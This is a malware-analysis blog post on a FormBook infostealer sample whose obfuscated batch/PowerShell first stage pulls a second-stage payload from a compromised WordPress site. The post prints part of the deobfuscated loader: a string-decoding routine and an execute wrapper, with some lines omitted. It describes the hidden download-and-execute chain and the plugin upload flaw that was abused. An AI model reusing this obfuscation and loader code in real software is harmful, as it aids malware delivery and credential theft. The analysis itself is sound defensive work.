Post

FormBook Malware - The Uninvited Guest of WordPress

Introduction

Hey everyone 🙏, today we’ll be exploring FormBook, an infostealer malware 🤖 that has been circulating since 2016, offering its malicious services on hacking forums as Malware as a Service (MaaS). Recently, I stumbled upon a fresh sample named rCheq0004783.bat on Malware Bazaar , dated May 15, 2024. It’s obfuscated, but after some digging, it’s just another FormBook variant which is executed after multi-stages of de-obfuscation.

What’s interesting is how this sample hides one of its payloads on a vulnerable WordPress website. Seems like the malware found a new hideout, Sneaky ? 🥸

Keep reading as I dig into the analysis, revealing FormBook’s newest tactics.

Malware Bazaar Figure - Malware Bazaar

Analysis

Download Sample from : Malware Bazaar , VirusTotal

The sample is obfuscated and looks like total gibberish at first glance, except for the first line, which reveals the batch script executing PowerShell in hidden mode. See [Figure - FormBook First Stage].

first Stage Batch Script Figure - Formbook First Stage

Let’s try to de-obfuscate this mess. I’ll copy and paste the obfuscated script into a new file, adding line breaks to make it look cleaner. I attempted replacing all semicolons with \n characters, but the output wasn’t very clear because some of the obfuscated strings contain semicolons. With no other options left, I went through each line and corrected the syntax, See below code snippet.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$Konvolutter = 1;
$premonopolises='Su';
$premonopolises+='bstrin';
$premonopolises+='g';

Function printermanualer($Deferrals){
	$Coadmires=$Deferrals.Length-$Konvolutter;
	For($Imposante124=2;$Imposante124 -lt $Coadmires;$Imposante124+=3){
		$Diskenspringerens+=$Deferrals.$premonopolises.Invoke( $Imposante124, $Konvolutter);
	}
	$Diskenspringerens;
}

function Investeringsoversigterne($Entr){
	.($Expecter) ($Entr);
}

$Oreopithecus=printermanualer 'OcMEpoClzFei Gl  lReaOm/M,5 ,.La0Ba Bo(AlW RiHinAfd ,oFrwZasAn  eN .TAr P,1Cl0 H.Ev0 O;Bl  NWFoi en A6 B4 H;Wi ,yx M6e,4 u;In grrG,v  :.m1.o2On1Br. .0R,)Nu  ,GFoeFucSuk.eost/ D2Sn0.l1Ek0 z0Bi1 ,0,y1 O  rFEfiDrrSie.efA o UxA,/Sp1S 2.e1Pe.S,0Ou ';
$Havfiskers=printermanualer 'BeUOlsI eEir ,-RaA ,gL.eSpnFitGl ';

# ... (OMMITTING FEW LINES)
# ... (OMMITTING FEW LINES)
# ... (OMMITTING FEW LINES)

$Afglatningers=268444;
$neatify=27864;
Investeringsoversigterne (printermanualer '  $ ngM,l SoTabobaL lI :S,SgryGolAdlSyeA,p .sQei Cs,a He= U TeGu,eT t B- .CFiodrn.ct MeSunHetUn C,$PlSFlnh oH,b.abSpeTrr ns,o ');
# ... (OMMITTING FEW LINES)
Investeringsoversigterne (printermanualer 'An$BegHolDioW.b na dl ,:Aaa,alpalSkrA.oQuu unChd,a=mi$U,S .eIbl  v efU,o,nrL a  g,et.eeAfn.lsUn.UnsU,uS.bGas.otsor GiDenmig .(,n$.iAExfS,g,llSta UtBanCuiHynTrgTreShrIns,o,r $ NnDre SaBotPaiBdfB ySi)g. ');
Investeringsoversigterne $allround;

Its better than before, but still not readable. Lets decode this step by step. In the above code snippet, there are two functions: printermanualer and Investeringsoversigterne. The function printermanualer accepts a string input, performs some operations on it, and then returns a string. It appears that some decoding is taking place within this function. Let’s refer to this function as decode_str. I will rename all occurence of string printermanualer to decode_str. The other function Investeringsoversigterne executes input string, using keyword iex.

Let’s run the decode_str function in a PowerShell window to decode all strings present in the sample. See [Figure - decode_str 1 ]

func decode_str executed Figure - decode_str 1

Using decode_str function, I can now decode those gibberish strings found throughout the script. See [Figure - decode_str 2]

Decode_str example Figure - decode_str 2

Decoding the first variable $Oreopithecus revealed a user-agent string. This is a clear indication, that the script will likely perform HTTP communications, probably to download additional payloads.

After decoding all the strings in the same manner, I discovered a URL that stores the second-stage payload for this malware. This URL hosts a vulnerable WordPress website. See [Figure - WordPress URL].

WP Vuln Figure - WordPress URL

Using PowerShell’s System.Net.WebClient malware downloads the contents of the WordPress URL. See [Figure - WebClient]

Powershell Downloading 2nd Stage Figure - WebClient

The downloaded file is cleaned in multiple steps as shows in [Figure - Cleaning Nasard] before execution. Clean downloaded file Figure - Cleaning Nasard

I have created this CyberChef recipe which takes downloaded file as input and provides cleaned second-stage payload. See [Figure - CyberChef Recipe]

CyberChef Figure - CyberChef Recipe

Final Note

Alright, folks, there are a lot of FormBook malware analysis reports out there. My aim in this article was to shed light on how threat actors are abusing never-ending vulnerable WordPress websites.

In this case, the threat actor exploited a vulnerable WordPress plugin, leading to arbitrary file upload. Please refer to https://wpscan.com/vulnerability/a8350890-e6d4-4b04-a158-2b0ee3748e65/ for more information. Consequently, they utilized this WordPress website as a payload downloader service.

This post is licensed under CC BY 4.0 by the author.